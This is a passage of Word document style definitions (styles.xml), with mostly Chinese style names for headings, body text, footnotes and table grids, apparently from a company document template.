  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="43">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="66"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="44">
    <w:name w:val="Table Normal1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="28"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="17"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="48">
    <w:name w:val="CT-正文"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="49"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="CT-正文 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="48"/>
    <w:qFormat/>
    <w:locked/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="50">
    <w:name w:val="CT-二级标题"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:snapToGrid/>
      <w:spacing w:before="0"/>
      <w:ind w:left="460" w:hanging="460"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="51">
    <w:name w:val="网格型1"/>
    <w:basedOn w:val="3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正文1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="53">
    <w:name w:val="网格型2"/>
    <w:basedOn w:val="30"/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz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54">
    <w:name w:val="网格型3"/>
    <w:basedOn w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:rFonts w:ascii="DengXian" w:hAnsi="DengXian"/>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5">
    <w:name w:val="列出段落1"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="56"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="0"/>
      <w:ind w:firstLine="420"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="列出段落 字符"/>
    <w:link w:val="55"/>
    <w:uiPriority w:val="34"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="57">
    <w:name w:val="网格型4"/>
    <w:basedOn w:val="30"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>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8">
    <w:name w:val="批注文字 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="批注主题 字符"/>
    <w:basedOn w:val="58"/>
    <w:link w:val="29"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="15"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="61">
    <w:name w:val="正文图标题"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50"/>
      <w:ind w:left="425" w:hanging="425"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="62">
    <w:name w:val="正文2"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="63"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="560"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="正文2 Char"/>
    <w:link w:val="62"/>
    <w:qFormat/>
    <w:locked/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="zh-CN" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="未处理的提及1"/>
    <w:basedOn w:val="32"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="65">
    <w:name w:val="标正文"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="100" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="列表段落 字符"/>
    <w:link w:val="43"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="67">
    <w:name w:val="标图"/>
    <w:basedOn w:val="65"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:afterLines="0"/>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="copy1"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="69">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="32"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="70">
    <w:name w:val="长亭标题1"/>
    <w:basedOn w:val="2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="538135" w:themeColor="accent6" w:themeShade="BF" w:sz="24" w:space="1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="71">
    <w:name w:val="长亭标题2"/>
    <w:basedOn w:val="3"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="72">
    <w:name w:val="长亭标题3"/>
    <w:basedOn w:val="4"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="73">
    <w:name w:val="长亭标题4"/>
    <w:basedOn w:val="5"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="74">
    <w:name w:val="长亭正文"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="0" w:afterLines="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="422"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="75">
    <w:name w:val="TOC 标题1"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:snapToGrid/>
      <w:spacing w:before="240" w:after="0" w:afterLines="0" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2F5597" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="76">
    <w:name w:val="长亭文档名称"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="480" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DengXian" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="77">
    <w:name w:val="No Spacing"/>
    <w:link w:val="78"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="78">
    <w:name w:val="无间隔 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="77"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="79">
    <w:name w:val="长亭文档名称1"/>
    <w:basedOn w:val="76"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="80">
    <w:name w:val="长亭版本号"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="0" w:line="400" w:lineRule="exact"/>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="81">
    <w:name w:val="长亭文档日期"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="0" w:line="400" w:lineRule="exact"/>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="82">
    <w:name w:val="主题"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="0"/>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="宋体"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="83">
    <w:name w:val="长亭致谢标题"/>
    <w:basedOn w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:shd w:val="clear" w:color="auto" w:fill="4D9D6A"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="84">
    <w:name w:val="列表段落2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="420"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="85">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="32"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="86">
    <w:name w:val="Table Normal"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="87">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:kinsoku w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="160" w:afterLines="0"/>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="88">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="340" w:after="330" w:afterLines="50" w:line="578" w:lineRule="auto"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="auto"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="89">
    <w:name w:val="正文（长亭科技）"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="666666"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="91">
    <w:name w:val="标题 6 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="92">
    <w:name w:val="副标题 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="666666"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="93">
    <w:name w:val="脚注文本 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="21"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线 Light" w:cs="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="94">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:basedOn w:val="32"/>
    <w:link w:val="26"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="等线 Light" w:cs="Courier New"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="95">
    <w:name w:val="_Style 12"/>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96">
    <w:name w:val="_Style 13"/>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97">
    <w:name w:val="_Style 14"/>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98">
    <w:name w:val="_Style 15"/>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99">
    <w:name w:val="_Style 16"/>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0">
    <w:name w:val="_Style 17"/>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1">
    <w:name w:val="_Style 18"/>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2">
    <w:name w:val="_Style 19"/>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3">
    <w:name w:val="_Style 20"/>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4">
    <w:name w:val="_Style 21"/>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5">
    <w:name w:val="_Style 22"/>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6">
    <w:name w:val="_Style 23"/>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7">
    <w:name w:val="_Style 24"/>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8">
    <w:name w:val="_Style 25"/>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09">
    <w:name w:val="_Style 26"/>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0">
    <w:name w:val="_Style 27"/>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1">
    <w:name w:val="_Style 28"/>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2">
    <w:name w:val="_Style 29"/>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3">
    <w:name w:val="_Style 30"/>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4">
    <w:name w:val="_Style 31"/>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5">
    <w:name w:val="_Style 32"/>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6">
    <w:name w:val="_Style 33"/>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7">
    <w:name w:val="_Style 34"/>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8">
    <w:name w:val="_Style 35"/>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19">
    <w:name w:val="_Style 36"/>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0">
    <w:name w:val="_Style 37"/>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1">
    <w:name w:val="_Style 38"/>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2">
    <w:name w:val="_Style 39"/>
    <w:basedOn w:val="86"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:tblPr>
      <w:tblCellMar>
        <w:left w:w="108" w:type="dxa"/>
        <w:right w:w="108"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3">
    <w:name w:val="_Style 40"/>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4">
    <w:name w:val="_Style 41"/>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5">
    <w:name w:val="_Style 42"/>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6">
    <w:name w:val="_Style 43"/>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7">
    <w:name w:val="_Style 44"/>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8">
    <w:name w:val="_Style 45"/>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29">
    <w:name w:val="_Style 46"/>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0">
    <w:name w:val="_Style 47"/>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1">
    <w:name w:val="_Style 48"/>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2">
    <w:name w:val="_Style 49"/>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3">
    <w:name w:val="_Style 50"/>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4">
    <w:name w:val="_Style 51"/>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5">
    <w:name w:val="_Style 52"/>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6">
    <w:name w:val="_Style 53"/>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7">
    <w:name w:val="_Style 54"/>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8">
    <w:name w:val="_Style 55"/>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39">
    <w:name w:val="_Style 56"/>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0">
    <w:name w:val="_Style 57"/>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1">
    <w:name w:val="_Style 58"/>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2">
    <w:name w:val="_Style 59"/>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3">
    <w:name w:val="_Style 60"/>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4">
    <w:name w:val="_Style 61"/>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5">
    <w:name w:val="_Style 62"/>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6">
    <w:name w:val="_Style 63"/>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table" w:customStyle="1" w:styleId="147">
    <w:name w:val="_Style 64"/>
    <w:basedOn w:val="86"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:tblPr>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
